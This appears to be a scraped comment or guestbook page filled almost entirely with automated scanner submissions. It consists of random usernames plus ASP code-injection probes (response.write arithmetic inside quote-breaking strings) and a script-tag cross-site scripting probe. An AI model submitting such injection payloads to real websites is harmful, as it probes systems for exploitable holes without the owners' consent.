  "+response.write(9816635*9790058)+"


 • pHqghUme

  2021-05-06 09:39:38


  response.write(9816635*9790058)


 • pHqghUme

  2021-05-06 09:39:38


  '+response.write(9816635*9790058)+'


 • '+response.write(9994832*9751048)+'

  2021-05-06 09:39:37


  1


 • "+response.write(9994832*9751048)+"

  2021-05-06 09:39:37


  1


 • pHqghUme

  2021-05-06 09:39:36


  1


 • response.write(9994832*9751048)

  2021-05-06 09:39:36


  1


 • pHqghUme

  2021-05-06 09:39:35


  1


 • pHqghUme

  2021-05-06 09:39:35


  1


 • pHqghUme

  2021-05-06 09:39:34


  1


 • pHqghUme

  2021-05-06 09:39:34


  1


 • pHqghUme

  2021-05-06 09:39:33


  1


 • pHqghUme

  2021-05-06 09:38:36


  1


 • pHqghUme

  2021-05-06 09:38:21


  1


 • pHqghUme

  2021-05-06 09:34:12


  1


 • pHqghUme

  2021-05-06 09:33:43


  1


 • pHqghUme

  2021-05-06 09:33:25


  1zADiLFLO


 • 1frvYCDrO

  2021-05-06 09:33:07


  1


 • pHqghUme

  2021-05-06 09:32:24


  1


 • 1frvYCDrO

  2021-05-06 09:32:24


  1


 • pHqghUme

  2021-05-06 09:32:23


  1


 • pHqghUme

  2021-05-06 09:06:27


  1


 • tMtFQiRt

  2020-12-31 07:46:57


  19384443


 • tMtFQiRt

  2020-12-31 07:44:54


  1'"()&%<acx><ScRiPt >NENy(9110)</ScRiPt>


 • tMtFQiRt9767272